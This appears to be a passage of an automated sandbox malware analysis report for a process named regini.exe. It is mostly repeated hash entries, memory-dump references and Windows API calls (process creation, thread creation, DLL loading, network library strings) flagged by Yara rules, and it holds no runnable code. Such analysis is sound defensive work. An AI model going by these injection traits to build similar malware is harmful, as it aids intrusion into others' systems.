                                                                              • Opcode Fuzzy Hash: 73a40fad0d6aab53520146d3f03d8251810750bf45f892b4c0c4cad5e1c93e3c
                                                                              • Instruction Fuzzy Hash: E590023260540802D55071584414747000587D1301F55C061E0128655D87558B5576A5
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 66bb618ddb3cc66ee925b15310b3d99d1bb28d977cc1fdd39d503856b16fb06f
                                                                              • Instruction ID: 21680c3e9b1eabf4fb714418123a8637a46472f80fba6b12a4d11b18e72edfd0
                                                                              • Opcode Fuzzy Hash: 66bb618ddb3cc66ee925b15310b3d99d1bb28d977cc1fdd39d503856b16fb06f
                                                                              • Instruction Fuzzy Hash: FC90023220140802D5807158440464B000587D2301F95C065E0129655DCA158B5977A5
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 12bf8f236a9f0b51ec83cbcca1e9065a4a24135ff8cc10cbed371f278e6429c0
                                                                              • Instruction ID: d6c2242da1ff3b1fe42fcfc1c7182aa4bd79f261b1b824512db5880fd8dc57f0
                                                                              • Opcode Fuzzy Hash: 12bf8f236a9f0b51ec83cbcca1e9065a4a24135ff8cc10cbed371f278e6429c0
                                                                              • Instruction Fuzzy Hash: 9A90023220544842D54071584404A47001587D1305F55C061E0168695D96258E55B665
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 11f9a60044227462430a838c6d02eed95a749499d9310a7f76525a2ffaa1a0c2
                                                                              • Instruction ID: 7d037b095a0ae8fa953b5cf6a12297438af5b7a5657f22aa9f960375b57c6caa
                                                                              • Opcode Fuzzy Hash: 11f9a60044227462430a838c6d02eed95a749499d9310a7f76525a2ffaa1a0c2
                                                                              • Instruction Fuzzy Hash: 6390027220240003450571584414617400A87E1201B55C071E1118591DC52589916129
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 30180f41563fe970b17a2ce791f471929b77dc470854d1aae428d12e4a82be9f
                                                                              • Instruction ID: b1157c08c71f47dd268d36783a08b877374c5271eff31ae9531752c1568e7362
                                                                              • Opcode Fuzzy Hash: 30180f41563fe970b17a2ce791f471929b77dc470854d1aae428d12e4a82be9f
                                                                              • Instruction Fuzzy Hash: 2A90023260140502D50171584404617000A87D1241F95C072E1128556ECA258A92A135
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: b4e80a544285b234d0479431b84af566b95416f83e260362c83b40fbce973cdc
                                                                              • Instruction ID: 52786a2f815cca3e244b5af0bf0a90866aa461b1bf6d2eb4eedc98b98360cedc
                                                                              • Opcode Fuzzy Hash: b4e80a544285b234d0479431b84af566b95416f83e260362c83b40fbce973cdc
                                                                              • Instruction Fuzzy Hash: 9590027220180403D54075584804607000587D1302F55C061E2168556E8A298D516139
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 4f4a9aaef86ff315834d74dc6951487a11df6f01d24ce86138bbf65f629d3e31
                                                                              • Instruction ID: a103fdeb12da8013a55c69b4a573e4b9be0e1eba970a196f2455c0d1e6dca17b
                                                                              • Opcode Fuzzy Hash: 4f4a9aaef86ff315834d74dc6951487a11df6f01d24ce86138bbf65f629d3e31
                                                                              • Instruction Fuzzy Hash: BD900232601400424540716888449074005ABE2211755C171E0A9C551D855989655669
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 3511eae44ecbfdec1fca662a3868027a7b829ee3f9528c11b99d22a83eab5252
                                                                              • Instruction ID: c9575d2b2661c5c30a1a06fa2bda2289c5887fb20a847763caf0b0df980c2339
                                                                              • Opcode Fuzzy Hash: 3511eae44ecbfdec1fca662a3868027a7b829ee3f9528c11b99d22a83eab5252
                                                                              • Instruction Fuzzy Hash: 6B900232211C0042D60075684C14B07000587D1303F55C165E0258555CC91589615525
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: db9dad00a6938ba2f96f5ef3c65c042babfd9a9eb2e44d29e2ec71ace575aa90
                                                                              • Instruction ID: 7280f2d1374815c1b1467c7259d3a13d89d1452a52e4a0aa374c401ee13eb0f1
                                                                              • Opcode Fuzzy Hash: db9dad00a6938ba2f96f5ef3c65c042babfd9a9eb2e44d29e2ec71ace575aa90
                                                                              • Instruction Fuzzy Hash: F590027234140442D50071584414B070005C7E2301F55C065E1168555D8619CD52612A

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 459 241103a-2411044 460 2411046-241104d 459->460 461 241107e-2411081 459->461 462 2411096-24110ab 460->462 463 241104f-2411059 460->463 464 24110ad-24110c5 462->464 465 241112c-241114e 462->465 463->461 464->465 466 2411170-2411175 465->466 467 2411150-2411161 PostThreadMessageW 465->467 467->466 468 2411163-241116d 467->468 468->466
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: +Yf$7046-nn1K$7046-nn1K
                                                                              • API String ID: 0-152878582
                                                                              • Opcode ID: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                              • Instruction ID: 1193c7ab15b0fbd3b7ee442c728bff178e80d335e61a4867680ee4c617b4d76d
                                                                              • Opcode Fuzzy Hash: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                              • Instruction Fuzzy Hash: 9F114C72A453566AC713CFA48C41BDDBB649F42600F0486EBDA0C9F6C1D3B18D4BC795
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(7046-nn1K,00000111,00000000,00000000), ref: 0241115D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID: 7046-nn1K$7046-nn1K
                                                                              • API String ID: 1836367815-59622768
                                                                              • Opcode ID: d7e9b385db7a893af6d06d15f612bd5b028044d3961f742fb336328be005be11
                                                                              • Instruction ID: b9ec8e4753e8bcc3631bfdcf81a2b7daa87a57529aa3d56ad415f371f87a4d3a
                                                                              • Opcode Fuzzy Hash: d7e9b385db7a893af6d06d15f612bd5b028044d3961f742fb336328be005be11
                                                                              • Instruction Fuzzy Hash: A901C471D4025876EB21AB928C41FDFBB7C9F41B90F00815AFB087B2C0D7B866068BE5
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeUninitialize
                                                                              • String ID: @J7<
                                                                              • API String ID: 3442037557-2016760708
                                                                              • Opcode ID: 5c8f61afe39968cdc0262e8706fd851897aae8b8c2792e7432e2034d9de46969
                                                                              • Instruction ID: 0790353b45020b37ff475e07804c00938ec3ce6244dd55527bc3d12d236dd0c4
                                                                              • Opcode Fuzzy Hash: 5c8f61afe39968cdc0262e8706fd851897aae8b8c2792e7432e2034d9de46969
                                                                              • Instruction Fuzzy Hash: 134152B6A00609AFDB00DFD9DC809EFB7B9FF88304B104559E515AB214D775AA05CFA0
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000007D0), ref: 02423D8B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID: net.dll$wininet.dll
                                                                              • API String ID: 3472027048-1269752229
                                                                              • Opcode ID: caf3f53cf78b67052efb43c6d0e36f4632bc381f8b2bc07a40985e89f40086ca
                                                                              • Instruction ID: 12a814343b2a9382d135f620b06725443507a1fc541cb9e6d514b51bc0f0f9cc
                                                                              • Opcode Fuzzy Hash: caf3f53cf78b67052efb43c6d0e36f4632bc381f8b2bc07a40985e89f40086ca
                                                                              • Instruction Fuzzy Hash: E3319CB0A01205BBD714DFA5C880FEBBBB9EB84700F40811EE91DAB240C7B46644CFA0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeUninitialize
                                                                              • String ID: @J7<
                                                                              • API String ID: 3442037557-2016760708
                                                                              • Opcode ID: 1c77e547fd79fcce36bf9df70f39e975db22a09bbaa201da96c6956962a185f2
                                                                              • Instruction ID: d7be4e2e6dcaafaaa1762d95da292098b5f86a51c31fd34d79fd601f602eb101
                                                                              • Opcode Fuzzy Hash: 1c77e547fd79fcce36bf9df70f39e975db22a09bbaa201da96c6956962a185f2
                                                                              • Instruction Fuzzy Hash: FB313EB5A0060AAFDB00DFD9D8809EFB7B9FF88304B108559E515EB214D775EE06CBA0
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 024148F2
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 295511a4b9a9809ddb0f2405e035b47971a4899ec19f0757c05ee201b5cbdbb2
                                                                              • Instruction ID: 19311ac196069876fe3a1e2f7a2f94a8dd05918ccf9a5d20252c5c054ae57e2d
                                                                              • Opcode Fuzzy Hash: 295511a4b9a9809ddb0f2405e035b47971a4899ec19f0757c05ee201b5cbdbb2
                                                                              • Instruction Fuzzy Hash: 7601703AA4428C7BDF10EA74DC41AD9B778DF41745F044259D585E7602E632F60F8BC1
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 024148F2
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                              • Instruction ID: 4b172354a8529145839e537bd7419c784812d8b33bf5728ae0361a1101b36b2a
                                                                              • Opcode Fuzzy Hash: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                              • Instruction Fuzzy Hash: F90125B5D4024DA7DF10EBE5DC81FDEB3799B44708F104196E908A7281F671E718CB91
                                                                              APIs
                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,0241864E,00000010,?,?,?,00000044,?,00000010,0241864E,?,?,?), ref: 02429B40
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
                                                                              • Opcode ID: d9af997e76cc9c93d5c50f47e23c34d344b85f94735d18940a576783256a0e6a
                                                                              • Instruction ID: c42f18639258fdcb642b6831c64953a93e33a0f548cd7d9d78d9ca43a1e1f40e
                                                                              • Opcode Fuzzy Hash: d9af997e76cc9c93d5c50f47e23c34d344b85f94735d18940a576783256a0e6a
                                                                              • Instruction Fuzzy Hash: F601C0B2201108BBCB44DF9ADC91EDB77ADAF8C714F008509BA09E3240D630F9518BA4
                                                                              APIs
                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02409E25
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread
                                                                              • String ID:
                                                                              • API String ID: 2422867632-0
                                                                              • Opcode ID: 09599bacac6296b3e500525234d41ace2e86357925da6c38dffadbb1074705f5
                                                                              • Instruction ID: 32c61497c05692cecb5b4f6cd64f6a05830956a15526d9b624c7ce9549d546f4
                                                                              • Opcode Fuzzy Hash: 09599bacac6296b3e500525234d41ace2e86357925da6c38dffadbb1074705f5
                                                                              • Instruction Fuzzy Hash: 0DF0303379021436E62061EA9C42F9BB69DCB80B61F55402AF70CEA1C0D9A5B44146A4
                                                                              APIs
                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02409E25
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread
                                                                              • String ID:
                                                                              • API String ID: 2422867632-0
                                                                              • Opcode ID: 16b1c3e28c50ff0840523fe201d9b8e2824fdbd3defa945c96347b3a63df4177
                                                                              • Instruction ID: d95a02a955767baeede50eb47562b6b08cfaffc517dc60603068d17ea9abff36
                                                                              • Opcode Fuzzy Hash: 16b1c3e28c50ff0840523fe201d9b8e2824fdbd3defa945c96347b3a63df4177
                                                                              • Instruction Fuzzy Hash: 52F0923279031037E63062DACC82F8B769DCF84B60F11401AF70CEB2C0DAE5B8408AE5
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F84D8B,00000007,00000000,00000004,00000000,024140EB,000000F4), ref: 02429A8F
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                              • Instruction ID: 11b0a7e0554a7a369f68f8c01e61a43b4c600779e45ccf950c4a71d40a6b9a89
                                                                              • Opcode Fuzzy Hash: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                              • Instruction Fuzzy Hash: 33E092712102147BD610EF5ADC41FDB3BADEFC5750F008419F908A7241C731B9108BB8
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(02411D69,?,02425DDA,02411D69,0242589E,02425DDA,?,02411D69,0242589E,00001000,?,?,00000000), ref: 02429A3F
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                              • Instruction ID: cdc4cc387a748c8dd13f0af97a93d29df79722f6325062526f3544901f9db3e8
                                                                              • Opcode Fuzzy Hash: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                              • Instruction Fuzzy Hash: 1EE06D712082157BCA10EE5ADC41FAB33ADEFC5710F004419F908A7241CB30B9108AB4
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 024186BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: cbce35480b63f5581e3c40cdf66e398078c0d1383abfb7c38fdf9a54aebfa23b
                                                                              • Instruction ID: 5f28ab8fef136a7f1a8b01f2039197c180ec450b8f2f027aa473c10d7024dd2a
                                                                              • Opcode Fuzzy Hash: cbce35480b63f5581e3c40cdf66e398078c0d1383abfb7c38fdf9a54aebfa23b
                                                                              • Instruction Fuzzy Hash: 44E0867164030427FB246AB8DC45F6733689B48B28F584A61B91CDB3D1EB78F5014650
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02412060,024281DF,0242589E,02412023), ref: 024184B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: cb4f1fa0d927d0eb332dcaf108405a43969d706698edad673ee7f3d7385422b0
                                                                              • Instruction ID: 883790a3510e689cc65a1a915d524ab4bddc6f0f69e7203dad3d97ab64fe48a2
                                                                              • Opcode Fuzzy Hash: cb4f1fa0d927d0eb332dcaf108405a43969d706698edad673ee7f3d7385422b0
                                                                              • Instruction Fuzzy Hash: 92E08631A443047EFB509BF59C47F9A27A99B54394F04416AB90CE62C1EAA9A4014F64
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02412060,024281DF,0242589E,02412023), ref: 024184B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 5238db62bc8800101cee1923c7fb97072102e5e94c967eb6a009a61a8d4a7eea
                                                                              • Instruction ID: b903dd4fd292ffdc8c785d1fe8e01fa8fae65f7d418706061d0fba93478af068
                                                                              • Opcode Fuzzy Hash: 5238db62bc8800101cee1923c7fb97072102e5e94c967eb6a009a61a8d4a7eea
                                                                              • Instruction Fuzzy Hash: EED05E71A843043BF610AAE6DC87F16328DDB44794F458069B90CE62C2EEA8F0004AA5
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 500c8c811459b47cbd6f1b2aa79603db7d7890e43dafdef468b485e5c516d8d1
                                                                              • Instruction ID: 0f2e97b10265e754a7c4d9a713968a76473436b57b58e2f3265d3b03970fff3f
                                                                              • Opcode Fuzzy Hash: 500c8c811459b47cbd6f1b2aa79603db7d7890e43dafdef468b485e5c516d8d1
                                                                              • Instruction Fuzzy Hash: 66B092729029C5CAEE11F7604A08B2B7A00ABD1701F2AC0B2E3174686E4738C1D1E6BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3756702610.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2e60000_regini.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1f9faf44fc0a719ac5b8e1a663f872bc8667cff6f9682d8c059a1ae62bdb77ea
                                                                              • Instruction ID: 735b35edc1749d04193fb6d358f1cea2ef3fe48c17c1c315b1b35772db8fb737
                                                                              • Opcode Fuzzy Hash: 1f9faf44fc0a719ac5b8e1a663f872bc8667cff6f9682d8c059a1ae62bdb77ea
                                                                              • Instruction Fuzzy Hash: 04410B70598F4D4FD368EF68D085677B3E2FB45344F10A62DD98AC3252EB70E8428B85
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3756702610.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2e60000_regini.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                              • API String ID: 0-3558027158
                                                                              • Opcode ID: c50c5d711aa7f104fbc7c5df85f1a820149106898c39f028a156850a945b5dcf
                                                                              • Instruction ID: 61f7778df4ba1b0decf81455a22d26b17631110e6c91bc168844fe1e9843ede1
                                                                              • Opcode Fuzzy Hash: c50c5d711aa7f104fbc7c5df85f1a820149106898c39f028a156850a945b5dcf
                                                                              • Instruction Fuzzy Hash: F99160F04482988AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
